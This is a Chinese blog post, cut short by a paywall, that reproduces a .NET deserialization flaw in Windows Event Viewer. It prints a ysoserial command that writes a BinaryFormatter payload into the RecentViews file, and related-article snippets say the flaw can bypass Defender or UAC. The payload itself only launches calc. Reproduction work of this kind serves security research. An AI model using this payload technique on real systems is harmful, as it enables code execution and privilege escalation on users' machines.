最新Windows事件查看器.NET反序列化漏洞复现与分析

已于 2022-04-30 18:20:46 修改
阅读量2.5k 收藏
点赞数
分类专栏: 安全研究 文章标签: 系统安全 安全
于 2022-04-30 18:18:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanzt123/article/details/124516476
版权
本文详细介绍了Windows事件查看器的一个.NET反序列化漏洞,包括漏洞描述、复现过程和分析细节。作者在Windows 11 ARM版环境中成功复现了漏洞,并通过Process Monitor和Process Explorer揭示了漏洞利用的流程,指出payload需写入固定名称的RecentViews文件以触发反序列化操作。
摘要由CSDN通过智能技术生成

0x01. 漏洞描述

4月26日在twitter上看到Orange师傅发布了个windows事件查看器的 .Net 反序列化漏洞,感觉有点意思,故抽空简单做个复现与分析。

截屏2022-04-30 上午11.18.46

0x02. 漏洞复现

  • 测试环境:Windows 11,ARM版

作者给的payload:

ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%\Microsoft\Eventv~1\RecentViews

其中,%LOCALAPPDATA% 对应路径为:C:\Users\xxx\AppData\Local,xxx为用户名,

截屏2022-04-30 上午11.31.37

不过本人机器上并没有 Eventv~1 这个目录,遂用 Event Viewer 目录代替,经测试也可以成功。

截屏2022-04-30 上午11.37.26

对应Payload为:

ysoseri
最低0.47元/天 解锁文章
Brucetg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
.NET Framework漏洞(CVE-2017-8759)复现及后续渗透
sanc7ane的博客
02-25 7222
参考:!bhdresh 简介 CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码。FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本。黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net...
CVE-2020-9496 ofbiz反序列化漏洞分析1
08-03
CVE-2020-9496 ofbiz反序列化漏洞分析 OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、...
干货 | 最新Windows事件查看器.NET反序列化漏洞分析
zls365365的博客
06-02 494
0x01 漏洞背景4月26日@Orange Tsai 在Twitter上发表一个有关Windows事件查看器反序列化漏洞,可以用来绕过Windows Defender或者ByPass UAC等其它攻击场景,Orange视频里也给出了攻击载荷 DataSet“ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c ca...
.NET 漏洞分析 | 某ERP系统存在SQL注入
最新发布
ahhacker86的专栏
06-28 602
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面。
.NET高级代码审计(第一课)XmlSerializer反序列漏洞
zls365365的博客
06-04 705
0X00 前言在.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据映射为 .NET 对象。XmlSerializer类在程序中通过单个 API 调用来执行 XML 文档和对象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人员使用Type类的静态方法获取外界数据,并调用Deserialize反...
反序列化漏洞
2301_76160896的博客
06-20 123
反序列化漏洞详解
yaml反序化漏洞本地环境复现
11-23
**yaml反序列化漏洞本地环境复现** 在IT安全领域,`yaml反序列化漏洞`是一种常见的安全隐患,尤其在Java应用程序中。此漏洞通常出现在程序处理YAML(YAML Ain't Markup Language)格式的数据时,由于不当的反序列化...
java反序列化漏洞利用
01-14
Java反序列化漏洞利用是Java安全领域中的一个重要话题,它涉及到程序执行流程中的一个环节——序列化与反序列化。序列化是将对象的状态转换为字节流的过程,便于存储或网络传输;反序列化则是将字节流恢复为对象的...
Shiro-EXP:Apache Shiro 反序列化漏洞检测与利用工具,一键注入内存马
05-26
与项目相关文章首发于:Shiro exp使用手册Shiro rememberMe反序列化漏洞漏洞原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie,服务端对rememberMe的cookie值...
ActiveMQ反序列化漏洞(CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ反序列化漏洞(CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
ysoserial.net:用于各种.NET格式化程序的反序列化有效负载生成器
05-12
一种概念证明工具,用于生成利用不安全.NET对象反序列化的有效负载。 描述 ysoserial.net是在通用.NET库中发现的实用程序和面向属性的编程“小工具链”的集合,可以在适当的条件下利用.NET应用程序执行对象的不安全反序列化。 主驱动程序接受用户指定的命令,并将其包装在用户指定的小工具链中,然后将这些对象序列化为stdout。 当在类路径上具有必需小工具的应用程序不安全反序列化此数据时,该链将自动被调用并导致命令在应用程序主机上执行。 应该注意的是,漏洞在于应用程序执行不安全反序列化,而不是在类路径上具有小工具。 该项目的灵感来自 免责声明 该软件的创建纯粹是为了学术研究和有效防御技术的发展,除非明确授权,否则不得将其用于攻击系统。 项目维护者对软件的滥用不承担任何责任。 负责任地使用。 该软件是一个个人项目,与任何公司都没有关系,包括项目所有者和贡献者的雇主。 安装
反序列化漏洞详解
qq_59607911的博客
10-31 197
将对象的状态信息转换为可以存储或传输的形式的过程,一般将对象转换为字节流。序列化时,对象的当前状态被写入到临时或持久性存储区(文件、内存、数据库等)。●记录反序列化的失败信息。●最有效的方法是不接受来自不受信任源的序列化对象或者只使用原始数据类型的序列化,但这不容易实现。攻击者控制了序列化后的数据,将有害数据传递到应用程序代码中,发动针对应用程序的攻击。●完整性检查,如:对序列化对象进行数字签名,以防止创建恶意对象或序列化数据被篡改。●对象和数据结构攻击:应用中存在反序列化过程中或者之后被改变行为的类。
.NET最新漏洞CVE-2017-8759 POC已公布,大规模攻击即将来临
blackorbird的博客
09-14 186
图 世界范围内感染FinSpy 图(即漏洞利用导致下载的间谍程序)前天微软刚补好的漏洞,昨天fireeye发文,然后各平台开始写报告然而昨天在ISC大会,今天就看见po...
.NET Core 开源库被曝漏洞,可使恶意软件逃避检测,无补丁
smellycat000的专栏
07-06 1430
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队.NET Core库中存在一个漏洞,可导致恶意程序躲避安全软件的检测。该漏洞是由微软 .NET Core 库中的一个路径遍...
.net1.1的“漏洞”--杀手级的啊
净心编程
12-31 1666
今天在lake2的专栏里看到一贴,原文如下:“.net暗藏杀机?document.title=".net暗藏杀机? - "+document.title     有一回写了个VB.net的小程序,拿去放在空间上,然后用IE访问它(http://xxxx/x.exe)没想到程序居然直接运行了。原来当你的系统装了.net framework之后IE遇到.net程序就会自动执行而不是下载它。  
WEB攻防-.NET特性常见漏洞
weixin_45534587的博客
04-25 1186
C#编译成DLL或EXE文件:C#编写的代码在编译时会生成DLL或EXE文件,这些文件包含MSIL代码。.NET提供运行时环境:.NET框架的CLR提供运行时环境,负责将MSIL代码编译成机器码并执行。DLL文件是.NET程序集:在.NET中,DLL文件是程序集的一种形式,它包含可由多个应用程序共享的代码。因此,C#、.NET和DLL文件之间的关系是:C#编写的代码编译成包含MSIL代码的DLL或EXE文件,这些文件在.NET框架的CLR运行时环境中执行。
使用ysoserial生成反序列化文件
热门推荐
一个码农的笔记
06-01 2万+
感谢清水大佬的帮助,这个代码是他的 import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import ysoserial.payloads.CommonsBeanutils1; public class Test { public Test() { } public
fastjson反序列化漏洞复现过程
04-19
下面是fastjson反序列化漏洞复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用了Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码中的导入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值